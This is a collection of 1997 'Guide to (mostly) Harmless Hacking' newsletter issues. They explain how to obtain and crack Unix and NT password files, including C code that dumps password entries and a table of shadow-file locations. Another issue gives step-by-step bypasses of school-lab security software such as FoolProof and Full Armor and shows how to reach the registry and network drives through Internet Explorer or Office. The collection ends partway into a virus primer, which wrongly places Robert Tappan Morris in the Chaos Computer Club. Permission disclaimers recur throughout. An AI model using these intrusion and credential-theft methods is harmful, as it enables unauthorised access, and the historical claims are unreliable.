socks off, in the Bugtraq archives. Look for an entry titled "Password problem in Trumpet Winsock." These archives are at http://www.netspace.org/lsv-archive/bugtraq.html Another way to break into a computer is to get the entire password file. Of course the password file will be encrypted. But if your target computer doesn't run a program to prevent people from picking easy passwords, it is easy to decrypt many passwords. But how do you get password files? A good systems administrator will hide them well so even users on the machine that holds them can't easily obtain the file. The simplest way to get a password file is to steal a backup tape from your victim. This is one reason that most computer breakins are committed by insiders. But often it is easy to get the entire password file of a LAN remotely from across the Internet. Why should this be so? Think about what happens when you log in. Even before the computer knows who you are, you must be able to command it to compare your user name and password with its password file. What the computer does is perform its encryption operation on the password you enter and then compare it with the encrypted entries in the password file. So the entire world must have access somehow to this encrypted password file. You job as the would-be cracker is to figure out the name of this file and then get your target computer to deliver this file to you. A tutorial on how to do this, which was published in the ezine K.R.A.C.K (produced by od^pheak ), follows. Comments in brackets have been added to the K.R.A.C.K. text. ********************************************* Strategy For Getting Root With a shadowed Passwd step#1 anonymous ftp into the server get passwd [This step will almost never work, but even the simplest attack may be worth a try.] step #2 To defeat password shadowing on many (but not all) systems, write a program that uses successive calls to getpwent() to obtain the password file. Example: #include main() { struct passwd *p; while(p=3Dgetpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } Or u can Look for the Unshadowed Backup..... [The following list of likely places to find the unshadowed backup is available from the "Hack FAQ" written by Voyager. It may be obtained from http://www-personal.engin.umich.edu/~jgotts/hack-faq] Unix Path needed Token ---------------------------------------------------------------------- AIX 3 /etc/security/passwd ! or /tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct = ##username SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb =20 Step #3 crack it [See below for instructions on how to crack a password file.] ************************************************** So let's say you have managed to get an encrypted password file. How do you extract the passwords? An example of one of the many programs that can crack poorly chosen passwords is Unix Password Cracker by Scooter Corp. It is available at ftp://ftp.info.bishkek.su/UNIX/crack-2a/crack-2a.tgz or http://iukr.bishkek.su/crack/index.html A good tutorial on some of the issues of cracking Windows NT passwords may be found at http://ntbugtraq.rc.on.ca/samfaq.htm One password cracker for Windows NT is L0phtcrack v1.5. It is available for FREE from http://www.L0pht.com (that's a ZERO after the 'L', not an 'o'). It comes with source so you can build it on just about any platform. Authors are mudge@l0pht.com and weld@l0pht.com. Another Windows NT password cracker is Alec Muffett's Crack 5.0 at http://www.sun.rhbnc.ac.uk/~phac107/c50a-nt-0.10.tgz Even if you crack some passwords, you will still need to correlate passwords with user names. One way to do this is to get a list of users by fingering your target computer. See the GTMHH Vol.1 No.1 for some ways to finger as many users as possible on a system. The verify command in sendmail is another way to get user names. A good systems administrator will turn off both the finger daemon and the sendmail verify command to make it harder for outsiders to break into their computers. If finger and the verify commands are disabled, there is yet another way to get user names. Oftentimes the part of a person's email that comes before the "@" will also be a user name. If password cracking doesn't work, there are many -- way too many -- other ways to break into a computer. Following are some suggestions on how to learn these techniques. 1. Learn as much as you can about the computer you have targeted. Find out what operating system it runs; whether it is on a local area network; and what programs it is running. Of special importance are the ports that are open and the daemons running on them. For example, if you can get physical access to the computer, you can always get control of it one way or another. See the GTMHHs on Windows for many examples. What this means, of course, is that if you have something on your computer you absolutely, positively don't want anyone to read, you had better encrypt it with RSA. Not PGP, RSA. Then you should hope no one discovers a fast way to factor numbers (the mathematical Achilles Heel of RSA and PGP). If you can't get physical access, your next best bet is if you are on the same LAN. In fact, the vast majority of computer breakins are done by people who are employees of the company that is running that LAN on which the victim computer is attached. The most common mistake of computer security professionals is to set up a firewall against the outside world while leaving their LAN wide open to insider attack. Important note: if you have even one Windows 95 box on your LAN, you can't even begin to pretend you have a secure network. That is in large part because it will run in DOS mode, which allows any user to read, write and delete files. If the computer you have targeted is on the Internet, your next step would be to determine how it is connected to the Internet. The most important issue here is what TCP/IP ports are open and what daemons run on these ports. *************************************************** Newbie note: TCP/IP ports are actually protocols used to direct data into programs called "daemons" that run all the time an Internet host computer is turned on and connected to the Net, waiting for incoming or outgoing data to spur it into action. An example of a TCP/IP port is number 25, called SMTP (simple mail transport protocol). An example of a daemon that can do interesting things when it gets data under SMTP is sendmail. See the GTMHH on forging email for examples of fun ways to play *legally* with port 25 on other people's computers. For a complete list of commonly used TCP/IP ports, see RFC 1700. One place you can look this up is http://ds2.internic.net/rfc/rfc1700.txt **************************************************** 2. Understand the operating system of the computer you plan to crack. Sure, lots of people who are ignorant on operating systems break into computers by using canned programs against pitifully vulnerable boxes. As one teen hacker told me after returning from Def Con V, "Many of the guys there didn't even know the 'cat' command!" Anyone can break into some computer somewhere if they have no pride or ethics. We assume you are better than that. If the breakin is so easy you can do it without having a clue what the command "cat" is, you aren't a hacker. You're just a computer vandal. 3. Study the ways other people have broken into a computer with that operating system and software. The best archives of breakin techniques for Unix are Bugtraq http://www.netspace.org/lsv-archive/bugtraq.html. For Windows NT, check out http://ntbugtraq.rc.on.ca/index.html. A cheap and easy partial shortcut to this arduous learning process is to run a program that scans the ports of your target computer, finds out what daemons are running on each port, and then tells you whether there are breakin techniques known to exist for those daemons. Satan is a good one, and absolutely free. You can download it from ftp://ftp.fc.net/pub/defcon/SATAN/ or a bazillion other hacker ftp sites. Another great port scanner is Internet Security Scanner. It is offered by Internet Security Systems of Norcross, Georgia USA, 1-800-776-2362. This tool costs lots of money, but is the security scanner of choice of the people who want to keep hackers out. You can reach ISS at http://www.iss.net/. Internet Security Systems also offers some freebie programs. The "Localhost" Internet Scanner SAFEsuite is set to only run a security scan on the Unix computer on which it is installed (hack your on box!) You can get it from http://www.blanket.com/iss.html. You can get a free beta copy of their scanner for Win NT at http://www.iss.net/about/whatsnew.html#RS_NT. In theory ISS programs are set so you can only use them at most to probe computer networks that you own. However, a few months ago I got a credible report that a giant company that uses ISS to test its boxes on the Internet backbone accidentally shut down an ISP in El Paso with an ISS automated syn flood attack. If you want to get a port scanner from a quiet little place, try out http://204.188.52.99. This offers the Asmodeus Network Security Scanner for Windows NT 4.0. In most places it is legal to scan the ports of other people's computers. Nevertheless, if you run Satan or any other port scanning tool against computers that you don't have permission to break into, you may get kicked off of your ISP. For example, recently an Irish hacker was running "security audits" of the Emerald Island's ISPs. He was probably doing this in all sincerity. He emailed each of his targets a list of the vulnerabilities he found. But when this freelance security auditor probed the ISP owned by one of my friends, he got that hacker kicked off his ISP. "But why give him a hard time for just doing security scans? He may have woken up an administrator or two," I asked my friend. "For the same reason they scramble an F-16 for a bogie," he replied. The way I get around the problem of getting people mad from port scanning is to do it by hand using a telnet program. Many of the GTMHHs show examples of port scanning by hand. This has the advantage that most systems administrators assume you are merely curious. However, some have a daemon set up so that every time you scan even one port of their boxes, it automatically sends an email to the systems administrator of the ISP you use complaining that you tried to break in -- and another email to you telling you to turn yourself in! The solution to this is to use IP spoofing. But since I'm sure you are only going to try to break into computers where you have permission to do so, you don't need to know how to spoof your IP address. ****************************************************** You may laugh yourself silly warning: If you port scan by hand against obscure.sekurity.org, you may run into some hilarious daemons installed on weird high port numbers. ****************************************************** 4. Now that you know what vulnerable programs are running on your target computer, next you need to decide what program you use to break in. But aren't hackers brilliant geniuses that discover new ways to break into computers? Yes, some are. But the average hacker relies on programs other hackers have written to do their deeds. That's why, in the book Takedown, some hacker (maybe Kevin Mitnick, maybe not) broke into Tsutomu Shimomura's computer to steal a program to turn a Nokia cell phone into a scanner that could eavesdrop on other people's cell phone calls. This is where those zillions of hacker web pages come into play. Do a web search for "hacker" and "haxor" and "h4ck3r" etc. You can spend months downloading all those programs with promising names like "IP spoofer." Unfortunately, you may be in for an ugly surprise or two. This may come as a total shock to you, but some of the people who write programs that are used to break into computers are not exactly Eagle Scouts. For example, the other day a fellow who shall remain nameless wrote to me "I discovered a person has been looting my www dir, where I upload stuff for friends so I am gonna leave a nice little surprise for him in a very cool looking program ;) (if you know what I mean)" But let's say you download a program that promises to exploit that security hole you just found with a Satan scan. Let's say you aren't going to destroy all your files from some nice little surprise. Your next task may be to get this exploit program to compile and run. Most computer breakin programs run on Unix. And there are many different flavors of Unix. For each flavor of Unix you can mix or match several different shells. (If none of this makes sense to you, see the GTMHHs on how to get a good shell account.) The problem is that a program written to run in, for example, the csh shell on Solaris Unix may not run from the bash shell on Slackware Linux or the tcsh shell on Irix, etc. It is also possible that the guy who wrote that breakin program may have a conscience. He or she may have figured that most people would want to use it maliciously. So they made a few little teeny weeny changes to the program, for example commenting out some lines. So Mr./Ms. Tender Conscience can feel that only people who know how to program will be able to use that exploit software. And as we all know, computer programmers would never, ever do something mean and horrible to someone else's computer. So this brings us to the next thing you should know in order to break into computers. 5. Learn how to program! Even if you use other peoples' exploit programs, you may need to tweak a thing or two to get them to run. The two most common languages for exploit programs are probably C (or C++) and Perl. ******************************************** Newbie note: If you can't get that program you just downloaded to run, it may be that it is designed to run on the Unix operating system, but you are running Windows. A good tip off that this may be your problem is a file name that ends with ".gz". ******************************************** So, does all this mean that breaking into computers is really, really hard? Does all this mean that if you break into someone's computer you have proven your digital manhood (or womanhood)? No. Some computers are ridiculously easy to break into. But if you break into a poorly defended computer run by dunces, all you have proven is that you lack good taste and like to get into really stupid kinds of trouble. However, if you manage to break into a computer that is well managed, and that you have permission to test, you are on your way to a high paying career in computer security. Remember this! If you get busted for breaking into a computer, you are in trouble big time. Even if you say you did no harm. Even if you say you made the computer better while you were prowling around in it. And your chances of becoming a computer security professional drop almost to zero. And -- do you have any idea of how expensive lawyers are? I haven't even hinted in this tutorial at how to keep from getting caught. It is at least as hard to cover your tracks as it is to break into a computer. So if you had to read this to learn how to break into computers, you are going to wind up in a world of hurt if you use this to trespass in other people's computers. So, which way do you plan to go? To be known as a good guy, making tons of money, and having all the hacker fun you can imagine? Or are you going to slink around in the dark, compulsively breaking into strangers'' computers, poor, afraid, angry? Busted? Staring at astronomical legal bills? If you like the rich and happy alternative, check out back issues of the Happy Hacker Digests to see what computers are open to the public to try to crack into. We'll also make new announcements as we discover them. And don't forget to try to crack obscure.sekurity.org. No one has managed to break it when attacking from the outside. I don't have a clue of how to get inside it, either. You may have to discover a new exploit to breach its defenses. But if you do, you will have experienced a thrill that is far greater than breaking into some Lower Slobovian businessman's 386 box running Linux 2.0 with sendmail 4.whatever. Show some chivalry and please don't beat up on the helpless, OK? And stay out of jail or we will all make fun of you when you get caught. Of course this Guide barely scrapes the surface of breaking into computers. We haven't even touched on topics such as how to look for back doors that other crackers may have hidden on your target computer, or keystroke grabbers, or attacks through malicious code you may encounter while browsing the Web. (Turn off Java on your browser! Never, ever use Internet Explorer.) But maybe some of you ubergenius types reading this could help us out. Hope to hear from you! ____________________________________________________________ Warning! Use this information at your own risk. Get busted for trying this out on some Lower Slobovian businessman's computer and we will all make fun of you, I promise! That goes double for Upper Slobovian boxes!! Want to see back issues of Guide to (mostly) Harmless Hacking? See http://goodweb.scol.net/hacker/index.html(the official Happy Hacker archive site). Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe" Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to list@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking! _____________________________________________________ Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. To subscribe, email hacker@techbroker.com with message "subscribe hh." ________________________________________________________ ____________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 6 How to Be a Hero in Computer Lab ____________________________________________________________ If you are a student, you know you can get into trouble if you hack your school's computers. But if you can persuade your teachers that you are the good guy who will help protect them from digital vandals, you can become a hero. You may even get their permission to try break-in techniques. ************************************************************ In this Guide you will learn how to: · Customize the animated logo on Internet Explorer · Circumvent security programs through Internet Explorer · Circumvent security programs through any Microsoft Office programs · Circumvent FoolProof · Circumvent Full Armor · Solve the web babysitter problem · Break into absolutely any school computer. · Keep clueless kiddie hackers from messing up your school computer system ************************************************************ This Guide will give you some tips for safely proving just how good you are, and maybe even showing your hacker teacher buddies a thing or two. But I would feel really bad if someone were to use the tips in this Guide to mess up his or her life. ************************************************************ You can mess up your life warning: In most countries kids don't have nearly the legal protections that adults have. If you get involved in a hacker gang at school and you guys get caught, you can easily get expelled from school or even arrested. Even if the authorities don't have very good proof of your guilt. Even if you are innocent. Arghhh! ************************************************************ First task of this Guide, then, is how to find teachers who would love to play hacker games with you and give you free run of the schools computer systems. Whoa, you say, now this is some social engineering challenge! But actually this isn't that hard. Coyote suggests, "in many cases you may find that if you prove yourself responsible (i.e.: not acting like a jerk in class and not hacking to be cool), it will be easier to gain the trust of the teacher and subsequently gain the job helping with the systems. And once you reach this level you are almost guaranteed that you will know more about system management, and of course hacking, than you could have by simply breaking in." Here's the first thing you need to remember. Your teachers are overworked. If they get mad at hackers, it is because computer vandals keep on messing things up. Guess who gets to stay late at work fixing the mess students make when they break into school computers? Right, it's usually your computer lab teachers. Think about it. Your computer lab teachers might really, really, like the idea of having you help with the work. The problem is -- will they dare to trust you? Karl Schaffarczyk warns, "I nearly got chucked out of school (many years ago) for pulling up a DOS prompt on a system that was protected against such things." Sheesh, just for getting a DOS prompt? But the problem is that your teachers go to a lot of effort to set school computers up so they can be used to teach classes. The minute they realize you know how to get to DOS, they know you could mess things up so bad they will have to spend a sleepless night -- or two or three -- putting that computer back together. Teachers hate to stay up all night. Imagine that! So if you really want to work a deal where you become supreme ruler and hero-in-chief of your school's computers, don't start by getting caught! Don't start even by showing your teacher, "Hey, look how easy it is to get a DOS prompt!" Remember, some authorities will immediately kick you out of school or call the cops. Honest, many people are terrified of teenage hackers. You can't really blame them, either, when you consider those news stories. Here are some examples of stories your school authorities have probably read. - 13 FEBRUARY 1997 Hackers are reported to be using servers at Southampton University to circulate threatening emails (that) ... instruct recipients to cancel credit cards, claiming their security has been breached. (c) VNU Business Publications Limited, 1997 NETWORK NEWS 7/5/97 P39 A teenager was fined an equivalent of US$350 for paralysing US telephone switchboards...The unnamed teenager made around 60,000 calls... (C) 1997 M2 Communications Ltd. TELECOMWORLDWIRE 6/5/97 WORLDCOM in the UK recently suffered a systems failure following a hacker attack... (C) 1997 M2 Communications Ltd. TELECOMWORLDWIRE 6/5/97 Scary, huh? It's not surprising that nowadays some people are so afraid of hackers that they blame almost anything on us. For example, in 1997, authorities at a naval base at first blamed attackers using high-energy radio waves for computer screens that froze. Later investigators learned that ship radars, not hackers, were freezing screens. So instead of getting mad at teachers who are terrified of hackers, give them a break. The media is inundating them with scare stories. Plus which they have probably spent a lot of time fixing messes made by kiddie hackers. Your job is to show them that you are the good guy. Your job is to show them you can make life better for them by giving you free run of the school computers. This same basic technique also will work with your ISP. If you offer to help for free, and if you convince them you are responsible, you can get the right to have root (or administrative) access to almost any computer system. For example, I was talking with the owner of the ISP one day, who complained how overworked he was. I told him I knew a high school sophomore who had been busted for hacking but had reformed. This fellow, I promised, would work for free in exchange for the root password on one of his boxes. Next day they did the deal. Now this hacker and his friends get to play break-in games on this computer during off hours when paying customers don't use it. In exchange, those kids fix anything that goes wrong with that box. So try it. Find an overworked teacher. Or overworked owner of an ISP. Offer to show him or her that you know enough to help take care of those computers. But how do you prove you know enough for the job? If you start out by telling your computer lab teacher that you know how to break into the school computers, some teachers will get excited and suspend you from school. Just in case your teacher is the kind who gets scared by all those hacker news stories, don't start out by talking about breaking in! Instead, start with showing them, with their permission, a few cheap tricks. Cheap Internet Explorer Tricks A good place to start is with Internet Explorer. For starters, what could be more harmless -- yet effective at showing off your talents -- than changing the animated logos on IE (IE) and Netscape? You could do it the easy way with Microangelo, available from ftp://ftp.impactsoft.com/pub/impactsoft/ma21.zip. But since you are a hacker, you may want to impress your teachers by doing it the hacker way. 1) Bring up Paint. 2) Click "image," then "attributes." 3) Choose width = 40, height=480, units in pels. 4) Make a series of pictures, each 40x40 pels. One way to do this is to open a new picture for each one and set attributes to width = 40 and height = 40. Then cut and paste each one into the 40x480 image. 5) Make the top 40x40 image be the one you want to have sit there when IE is doing nothing. The next three are shown once when a download starts, and the rest are played in a loop until the download is done. You must have an even number of images for this to work. 6)Now run the Registry editor. This is well hidden since Microsoft would prefer that you not play with the Registry. One way is to click "start," then "programs" then "MS-DOS," and then in the MS-DOS window with the C:\windows prompt give the command "regedit." 7) Click to highlight the subkey "HKEY_CURRENT_USER\Software\Microsoft\IE\Toolbar" 8) On the task bar above, click "Edit," then "Find." Type "Brandbitmap" in the find window. 9) Now double click on BrandBitmap to get a dialog window. Type the path and file name of your custom animated graphic into it. So let's say you set up a flaming skull that rotates when you run IE. Your teacher is impressed. Now she wants you to put it back the way it was before. This is easy. Just open up BrandBitmap, and delete the name of your animation file. Windows Explorer will then automatically revert to the saved graphic in BackBitmap. Let's now show your teacher something that is a little bit scary. Did you know that Internet Explorer (IE) can be used to break some Windows babysitter programs? Your school might be running one of them. If you play this right, you can win points by trashing that babysitter program. Yes, you could just get to work on those babysitter programs using the tips of the GTMHH on how to break into Win95. However, we will also look at a new way to get around them in this chapter, using IE. The advantage of using IE when your teacher is anxiously looking over your shoulder is that you could just "accidentally" stumble on some cool stuff, instead of looking like a dangerous hacker. Then you could show that you know how to take advantage of that security flaw. Besides, if it turns out the security program you try to override is well enough written to keep IE from breaking it, you don't look like a dummy. ************************************************************ Evil Genius tip: People are less afraid of you if you type sloowwwlllllyyyyyyyyyy. ************************************************************ The dirty little secret is that IE actually is a Windows shell program. That means it is an alternative to the Win95 desktop. From IE you may launch any program. IE operates much like the Program Manager and Windows Explorer that come with the Win 95 and Win NT operating systems. Yes, from the IE shell you can run any program on your computer -- unless the security program you are trying to break has anticipated this attack. With a little ingenuity you may be able to even gain control of your school's LAN. But don't try that just yet! ************************************************************ Newbie note: A shell is a program that mediates between you and the operating system. The big deal about IE being a Windows shell is that Microsoft never told anyone that it was in fact a shell. The security problems that are plaguing IE are mostly a consequence of it turning out to be a shell. By contrast, the Netscape and Mosaic Web browsers are not quite such full-featured shells. This makes them safer to use. But you can still do some interesting things with them to break into a Win95 box. Experiment and have fun! ************************************************************ To use IE as a Win95 shell, bring it up just like you would if you were going to surf the Web. If your computer is set to automatically initiate an Internet connection, you can kill it. You don't need to be online for this to work. Now here are a few fun suggestions. In the space where you would normally type in the URL you want to surf, instead type in c:. Whoa, look at all those file folders that come up on the screen. Now for fun, click "Program Files" then click "Accessories" then click "Paint." All of a sudden Paint is running. Now paint your teacher who is watching this hack surprised. Next close all that stuff and get back to the URL window in IE. Click on the Windows folder, then click on Regedit.exe to start it up. Export the password file (it's in HKEY_CLASSES_ROOT). Open it in Word Pad. Remember, the ability to control the Registry of a server is the key to controlling the network it serves. Show this to your teacher and tell her that you're going to use IE to change all the school's password files. In a few hours the Secret Service will be fighting with the FBI on your front lawn over who gets to try to bust you. OK, only kidding here. No, maybe it would be a bit better to tell your teacher that if you can edit the registry, you can get total control over that computer. And maybe much more. Suggest that the school delete IE from all its computers. You are on the road to being a hero. If you actually do edit the Registry, you had better know how to revert to its backup, or else undo your changes. Otherwise you will be making more work for the computer lab teacher instead of less work. Remember, the objective is to prove to your teachers you can cut how much work they have to do! What if the school babysitter program won't let you run regedit.exe? Try typing c:/command.com. Then see Chapter 2 for how to edit the Registry from DOS. If you have gotten this far with IE, next try entering r:/ or w:/ or z: etc. to see if you can access the disk of a network server. Be sure to do this with your teacher watching and with her permission to try to access network computers. If you succeed, now you have a really good reason to ask her to take IE off all the school computers. This is because you have just taken over the entire school LAN. But you are a hero because you have done it to save your school from those mean kiddie hackers who change grades and class assignments. By now you have a great shot at getting a volunteer job running the school's computer systems. Before you know it, you and your friends will be openly playing Quake at school -- and the authorities will consider it a small price to pay for your expertise. Cheap Tricks with Microsoft Office You also can run a Windows shell from several Microsoft Office programs. Remember, once you get a shell, you have a good shot at disabling security programs. The following exploit works with Microsoft Word, Excel, and Powerpoint. To use them get into a Windows shell: 1) Click "help", then "About Microsoft (name of program inserted here)," then "System Info..." 2) This brings up a window which includes a button labeled "run." Click "run" and put in anything you want, for example regedit.exe! (That is, unless the security program you are trying to break has a way to disable this.) Microsoft Access is a bit harder. The "run" button only gives a few choices. One of them is File Manager. But File Manager is also a Windows shell. From it you can run any program. (That is, unless the security program you are trying to break has a way to disable this.) How to Circumvent FoolProof There is usually a hotkey to turn off FoolProof. One young hacker reports his school uses shift-alt-X (hold down the shift and alt keys at the same time, then press the "x" key.) Of course other schools may have other arrangements. If you get the hotkey right, a sound may play, and a lock in the lower-right corner should open for 20-30 seconds. Dante tells how he managed to get out of a hot spot with an even better hack of Fool Proof. "My computer science teacher asked me to show her exactly HOW I managed to print the 'the universe revolves around me' image I made to all the network printers in the school..." So he had her watch while he did the deed. ************************************************************ You can get punched in the nose warning: Dante was lucky that his teacher was understanding. In some schools a harmless joke like this would be grounds for expulsion. ************************************************************ Here is how Dante -- and anyone -- may disable FoolProof. 1) First, break into the Windows box using one of the techniques of the GTMHHs on Hacking Windows. Warning -- don't try the soldering iron bit. Your teacher will faint. 3) Now you can edit the autoexec.bat and config.sys files. (Be sure to back them up.) In config.sys delete the line device=fp, and in autoexec.bat, delete fptsr.exe. 4) Run regedit.exe. You have to remove FoolProof from the Registry, too. Use the Regedit search feature to find references to Fool Proof. 5) Find the Registry backup files and make copies with different names just in case. Making a mistake with the Registry can cause spectacular messes! 6) Save the registry, and reboot. FoolProof won't load. 7) To put things back the way they were, rename the backup files. You are now the school hero security expert. How to Circumvent Full Armor "I ran up against this program 8 months ago at school, they attempted to prevent people from writing to the hard drive. It presented itself as a challenge....for about 5 minutes." -- Dave Manges. Here's how Dave tells us he did the deed: 1) In the properties of the program it mentions the thread file (can't remember the name of the file) it was something.vbx 2) OK...this is easy enough, open notepad, open something.vbx 3) Just because I can't write to the hard drive doesn't mean I can't edit something already there, delete the first character from the file. 4) The file (opened in notepad) looks like garbage, but if memory serves the first letter was M. 5) Save the File and restart the computer, it should come up with an error like "Unable to Initialize Full Armor". 6) Now you can go into add/remove programs and uninstall it. Again, remember to back up all files before changing them so you can put the computer back the way you found it. Solve the Web Babysitter Problem Suppose your next goal is to get rid of Web babysitter programs. But this can be a tough job. Think about it from the point of view of the teachers. If even one kid were to complain to her parents that she had seen dirty movies running on other kid's monitors in computer lab, your school would be in big trouble. So merely blasting your way through those babysitter programs with techniques such as those you learned in Chapter 2 will solve the problem for only a short time -- and get you and your teacher and your school in trouble. But once again you can be a hero. You can help your teachers discover the Web sites that are being blocked by those babysitter programs. They may be surprised to find out the block lots more than naughty pictures. They often secretly censor certain political sites, too. If your school is running CYBERsitter, you can really beat up on it. CYBERsitter has encrypted its list of banned sites, which include those with political beliefs they don't like. But you can download a program to decrypt this list at: http://peacefire.org/info/hackTHIS.shtml. (This Web site is maintained by a teen organization, Peacefire, devoted to freedom of speech.) When your teacher discovers the hidden political agenda of CYBERsitter, you are a hero. Unless, of course, your teacher agrees with CYBERsitter's tactics. If so, you can probably find other teachers in your school who will be appalled by CYBERsitter. How about IE's built-in site blocking system? It is harder to uncover what it blocks because it works by limiting the viewer to web sites that have "certificates" provided by a number of organizations. If a site hasn't gone to the effort of getting a certificate, IE can keep you from seeing it. Of course, after reading Chapter 2, you can quickly disable the IE censorship feature. But instead of doing this, how about directing your teacher to http://peacefire.org and let him or her follow the links? Then perhaps the authorities at your school will be ready to negotiate with you to find a way to give you freedom to surf without grossing out other kids in the computer lab or library who can't help but notice what may be on your monitor. How to Break into Absolutely any School Computer As you know from Chapter 2, you can break into any computer to which you have physical access. The trick is to figure out, once you have complete control, how to disable whatever program is giving you a hard time. There are only a few possible ways for these programs to work. Maybe all you need to do is control-alt-delete and remove it from the list of active programs that brings up. If this doesn't work, if you can get into DOS, you can edit any files. See Chapter 1 for details how all the ways to get to DOS. Or you may only need to access regedit.exe. You can run it from either DOS or, depending on how good your problem program is, from Windows. Once you can edit files, the ones you are likely to need to alter are autoexec.bat, config.sys, anything with the extension .pwl or .lnk, \windows\startm~1\programs\startup, and the Registry. Look for lines with suspicious names that remind you of the name of the program you want to disable. *********************************************************** You can get punched in the nose note: Of course you could do something obvious like "format c:" and reinstall only what you want on that box. But this will make your teachers throw fits. Mega fits. If you want to be a hero, make sure that you can always return any school computer to the way it was before you hacked it. *********************************************************** When you are done, turn the victim computer off and then back on again instead of a reboot with power still on. This will get rid of anything lingering in RAM that could defeat your efforts. Keep Clueless Kiddie Hackers from Messing up Your School Computers Now that you have shown your teachers that you can break absolutely any security on any box to which you have physical access, what next? Do you just leave your teachers feeling awed and helpless? Or do you help them? There is a reason why they have security systems on your school's computers. You would be amazed at all the things clumsy or malicious users can do. You can do your school a world of good by using your hacking skills to fix things so that security works much better. Here are some basic precautions that you can offer to your teachers to lock down school computers. (See the GTMHH on how to break into Windows computers for instructions on how to do most of these.) 1) Disable all boot keys. 2) Password the CMOS. If it already has a password, change it. Give your teacher the new password. 3) Remove any programs that allow the user to get to regedit or dos. 4) Programs that allow hot keys to circumvent security should be changed, if possible, to disable them. 5) Remove programs that can't be made safe. 6) Don't make it possible for Win95 computers to access sensitive data on a network disk. (The passwords can be easily grabbed and decoded.) 7) Try really, really hard to persuade the school administration to replace Win95 with WinNT. With experimentation you will figure out much more for yourself. Since Win95 is a totally insecure operating system, this will be a losing battle. But at least you will be able to keep secure enough that those students who do break in will know enough to not do anything disastrous by accident. As for malicious school hackers, sigh, there will always be kewl d00dz who think "format c:" shows they are, ahem, kewl d00dz. You may also have a problem with school administrators who may feel that it is inconvenient to set up such a secure system. They will have to give up the use of lots of convenient programs. Upgrading to WinNT will cost money. Try explaining to them how much easier it will be to keep those wannbe hacker vandals from trashing the school computers or using them to visit bianca's Smut Shack. Are you ready to turn your hacking skills into a great reputation at school? Are you ready to have the computer lab teachers begging to learn from you? Are you ready to have the entire school computer system under your control -- legally? You will, of course, only use the tricks of this Guide under the supervision of an admiring teacher, right? It sure is more fun than expulsion and juvenile court! ___________________________________________________________ To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. ___________________________________________________________ More Vol 3 GTMHH____________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 7, part 1 Introduction to Computer Viruses ____________________________________________________________ It’s Saturday morning. You boot up your Windows 98 computer and lo and behold, the graphics on the desktop are a mirror image of what they should be. Congratulations, you have a computer virus! According to “Virus Bulletin,” the Oxfordshire, England-based technical journal that tracks viruses, this new virus flips any uncompressed bitmaps horizontally, but only on Saturdays. This bulletin credits GriYo of the 29A virus-writing group as the author of this 32-bit polymorphic Windows virus now known as HPS (Hantavirus Pulmonary Syndrome). Panda Software of Spain has announced that it has the antidote to HPS. Meanwhile, other antivirus companies scramble to code a cure for this Windows 98 desktop graphics virus. So far HPS appears, like many viruses, to be harmless and humorous. According to the book “Computer Viruses” by Robert Slade (Springer, 1996), “The truth is that relatively few viral programs perform any overt damage to a system.” However, no matter how harmless any virus may appear to be, people worry that it might do something else, n bperhaps on some Friday the 13th or maybe, who knows Jan. 1, the year 2000. Even if GriYo had the best of intentions, people worry that a mistake buried somewhere in his HPS code might accidentally cause harm. Let’s face it. Turn a computer virus loose and you can become mighty unpopular -- regardless of how harmless, funny, or even beneficial you believe your virus might be. People don’t like to have programs running on their computers unless they make the decision to put them there. **************************************************************** In this Guide you will learn: Part One: * What is a computer virus? * Types of computer viruses * Why study and create viruses? * How to catch them * How to fight them **************************************************************** One of the nice things about the recent escalation in computer crime is that the media doesn’t make such a big fuss over viruses any more. Sure, they (viruses and the media both) can be a pain. However, with all those antivirus programs we can call upon for help, and with almost everyone now understanding the importance of frequent backups, viruses are no big deal, right? “Computer viruses are no big deal.” Famous last words? Digital viruses may be the first stages of artificial life. Think about it -- are we ready yet to share the planet with artificial life? Will we find some means of friendly coexistence, just as we have learned to safely enjoy cheetahs, lions and wolves? Will viruses perhaps even evolve into helpful life forms that will end poverty and war, help us understand the meaning of life itself and even shed light on the nature of God? Or will some computer virus designer create code that evolves into something that destroys the human race? Or ... maybe you readers will get fed up with me hyping viruses and flame war me into hiding! What is a Computer Virus? In 1988 the Internet was shut down by the “Morris Worm,” a self-replicating program coded by Robert Tappan Morris of the Chaos Computer Club. It used sendmail and finger exploits to break into and propagate from one Unix computer to another. By the time it had infected some 10% of the computers on the Internet, it was clogging essential Internet communications lines as the worm shipped around ever more copies of itself. Yet many computer scientists say we shouldn’t call the Morris Worm a computer virus. Before the first computer virus was ever coded, in 1984, Dr. Fred Cohen wrote his doctoral thesis on the topic (published in his book “Computer Viruses,” ASP Press, 1986). As a result, Cohen is credited by many with being the first to conceive of their existence. It is important to remember -- Cohen is AGAINST computer viruses. He didn’t invent them, but was the first to prove they could be created, and to foresee the damage they could cause. Purists hold by the definition of virus that appeared in Cohen’s doctoral thesis: a computer virus is code that, when active, attaches itself to other programs. However, long before Dr. Cohen detailed the characteristics of viruses, mathematician John von Neumann proved that a Turing machine (a mathematical construct representing a single-processor computer) is capable of containing a “universal 